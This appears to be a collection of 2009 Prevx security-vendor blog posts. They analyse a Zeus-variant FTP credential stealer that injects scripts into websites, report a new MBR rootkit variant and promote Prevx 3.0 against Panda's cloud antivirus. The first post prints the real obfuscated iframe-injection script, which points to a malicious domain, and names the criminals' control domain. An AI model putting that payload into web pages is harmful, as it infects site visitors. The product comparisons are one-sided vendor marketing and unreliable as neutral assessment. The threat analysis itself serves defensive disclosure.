On Wednesday the 24th of June, 2009 Prevx detected a new Trojan that is harvesting FTP details from compromised machines. The list of compromised machines is vast, we have seen 66,000 unique FTP server logins from unique domains rising to 74,000 by Friday. The list is now so large we have no way to effectively inform companies in a meaningful timeframe.

What is severity of this infection ?

We rate this infection as CRITICAL. The infection has a ‘china syndrome’ potential. It includes a cyclic infection which leverages infected PCs to programmatically modify hi-volume web sites to infect additional users who become part of the cycle. More users leads to more discovery of web site admin credentials which in turn leads to more web sites being modified to serve the infection which leads to more infected users.

What is the infection Vector ?

The malware infects users that visit a compromised website using various exploit kits such as ‘unique pack’. The compromised WebPages contain an injected script that looks something like the example below:

"var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');"

This will cause the browser to visit the site encoded in the script where an exploit kit will test various exploits against the browser and various other installed applications. Once there is a succcessfull infection various malware packages will be downloaded onto the machine based on Geolocation, installed applications and various other pieces of criteria.

What does the malware do ?

Once installed the malware, which is a variant of the Zeus family, scours the machines stored form cache looking for stored FTP login credentials, then once such logins are found it uses HTTP_POST to send this data to a server located in the Cayman Islands. Additionally, there is another component used, which acts as a script injector. This makes a call to a certain script on the server in the Cayman Islands, using domain goooodbill.cn This script gives the infected client a url in the format USERNAME:PASSWORD@FTP.ADDRESS.COM, the client then logs in to the given ftp site and modifies all index pages (asp,php,html) and injects the script. Once injected all visitors of the modified domain potentially become part of the infection network/cycle.

Has the malware done anything malicious yet ?

YES. As of 15:00 GMT, June 29th 2009, the malware started giving domains to the clients to start infecting. Prevx monitored in a 5 minute period 85 domains being targeted by a single infection. No doubt there are thousands of infected clients already injecting these scripts into the list of growing compromised ftp sites.

What does this mean ?

Using the clients to inject the script into the ftp sites ensures that the criminals remain anonymous. Besides that, they have a massive list of high value, high traffic websites that they can target. This means that potential visitors to the sites will then get infected because of the presence of the script.

As said before, this is not the only malware that the exploit kit serves out, there are various other password stealers, rootkits, et al that get distributed.

Almost two months are gone since when we have isolated the new variant of MBR Rootkit. We have already written a technical blog post about it and new techniques used by this nasty rootkit. I thought it could have been useful to who would write a detector for it.

Unfortunately, two months are off, only a couple of security vendors and independent researchers implemented a working detector for it. This is not good, especially if we are talking about the same threat that has infected ten of thousands of PC around the globe last year, stealing password, bank accounts and personal informations.

Actually, as written in one of my previous posts, first version of MBR rootkit could have still been used with a large success by its creators. In fact, the main problem for the attacker is the dropper because of antivirus detections. Anyway MBR rootkit droppers have been able to evade signature and heuristic detections of most of antivirus softwares - their creators know quite well how to do their dirty job.

Then, after the dropper infected the system, only a really small number of antirootkit softwares are able to detect it.

Anyway, rootkit writers decided to do a step ahead and they released what can be currently defined the worst rootkit in the wild. Almost every antirootkit has been bypassed.

Now, after two months, we've isolated another new variant of this MBR rootkit. Most likely its creators didn't like there were already a couple of vendors able to detect their creature, so they decided to wipe them off.

We have checked how many antirootkits are already able to detect the new version of MBR rootkit we've isolated two months ago. Result is that only five applications are able to fully detect this threat - included Prevx 3.0 which has been the first.

Now, after this update, we're the only one still able to detect and succesfully remove the infection.

New MBR rootkit includes a much stronger filtering engine, able to filter out more in depth every attempt done by security softwares to read the Master Boot Record.

Good news is that they have removed some routines used to hide the hook set by the rootkit for disk access filtering. Anyway I think it could be a temporary choice, because the DKOH technique previously applied is able to make the rootkit still more hidden.

The fancy idea to hook the lower driver to which \Device\Harddisk0\DR0 is attached is still a winning one, because it's quite difficult to be bypassed.

Even if you think to unhook it, then it will still be difficult to restore the original function because you are not going to handle always with the same hooked driver, but instead the driver could be a different one from system to system. For example, sometimes the lower driver next to Disk.sys is ACPI.sys, sometimes is vmscsi.sys, yet sometimes it's directly atapi.sys. You have to trace down which driver has been hooked and then you've to know which is the original function replaced. Annoying, indeed.

I didn't write this in the first blog post about new MBR rootkit but looks like this idea has been picked up from another proof of concept bootkit, called Tophet.A and presented at last XCon conference.

As written before, we started seeing this new MBR rootkit quickly spreading on internet as it is dropped by compromised websites that host malicious iframes and obfuscated javascripts.

Security vendors should take care of this threat instead of waiting the end of this 2009 and claiming that MBR rootkit has been the worst threat of the year, like happened last year.

Prevx 3.0 is able to fully detect and remove the infection for free.

Prevx 3.0 - the smallest, the lightest, the fastest, and also the best!

Firstly, a massive thank you - to what has to be one of the smartest security R&D teams in the cyber security industry. Although we have more on the product road map than ever before, Prevx 3.0 seems to be winning people over at every turn. Undoubtedly, the smallest, lightest, fastest and now Editor's choice in the full review by PCMag.com.

Read the full review at PCMag.com

But, we are nowhere near finished yet

As the dust settles on this review, we turn our attentions to the forthcoming Q3 release. This updated version of Prevx 3.0 includes significantly better malware cleanup, additional layers of protection and much more extensive behavioral monitoring and reporting for corporate and consumer techies, but as quiet as the current release.... for the rest of us! So as they say..... the best is still to come.

Prevx has the only thin-client cloud based anti-malware solution

Firstly, let's define the characteristics of a thin-client, cloud based anti-malware solution. We believe that Prevx 3.0 is a good example. The client or security agent is a tiny 800Kilobyte download. It provides a full range of anti-malware protection including powerful rootkit and 'early life' malware detection and remediation. It has no locally stored signatures. It has no discernible impact on system performance. It has class leading low levels of system resource utilization and a minute footprint. It feeds and feeds off the World's largest online threat database. It is always up to date. It can scan a system in much less than five minutes.

Compared to Prevx 3.0, Panda's Cloud Antivirus isn't even close

Let me now explain why I believe that Panda's Cloud Antivirus doesn't shape up. Well firstly, it is an 18Mb download, which Panda obviously thinks is impressive. It is actually 22.5 times bigger than the Prevx 3.0 agent. It isn't even that much smaller than some of the full blown conventional AV packages from vendors like AVG, Symantec, McAfee or Kaspersky. We tested the agent yesterday and were left totally underwhelmed. It missed a common place TDS rootkit completely and took more than 1.5 HOURS to scan one of our office PCs running Vista and using a 45Mbp/sec dedicated internet pipe. About 30 times longer than Prevx 3.0 took to scan the same PC, find and remove the TDS rootkit.

Panda is only 3 years late to lay claim to being the first with a cloud based AV

I wouldn't mind Panda trying to lay claim to being the first to market with a cloud based AV but they are actually three years too late to make that claim. I wouldn't mind that quite so much, if I hadn't demonstrated our Prevx 1 and Prevx 2 solutions (also cloud based like Prevx 3.0), to their Chief Technology Officer, 3 years ago in Panda's head quarters in Bilbao. With that in mind, such a claim was knowingly false when they made their announcement this week. But I suppose, it comes from a market sector that has got used to overhyping security solutions, for years. You know, alongside the product names like Total Protection, and 'all you ever need security for online banking' etc. Which are similarly bogus claims. But in Panda's case I find their claims simply rude and offensive given our previous dealings!

We don't even claim Prevx 3.0 is a silver bullet, but Panda's Cloud Antivirus only fires rubber bullets

OK, I can hear the protestations now. But it's only in Beta. Maybe the 18MByte download still has debug code in it and it will eventually shed 90% of its bloat before it goes live. But A SILVER BULLET!! Hardly, we wouldn't even claim that for Prevx 3.0. Panda's Cloud Anitivirus may claim to being a Silver Plated Rubber Bullet. You know like the socks described as Cotton Rich that leave your feet aching after 5 days standing at RSA 2009 and 3 days this week at InfoSec.

Panda, we used to sing your praises, and we know you can do better

Having played with Panda's Cloud Antivirus beta for a few hours I believe it is so far off the mark it will need a complete redesign and redevelopment to even come close to the mark. I'd also recommend downplaying the marketing hype as it only leads to greater disappointment for your users. Maybe you could position Panda Cloud Antivirus as an in-house proof-of-concept, or better still, a prototype!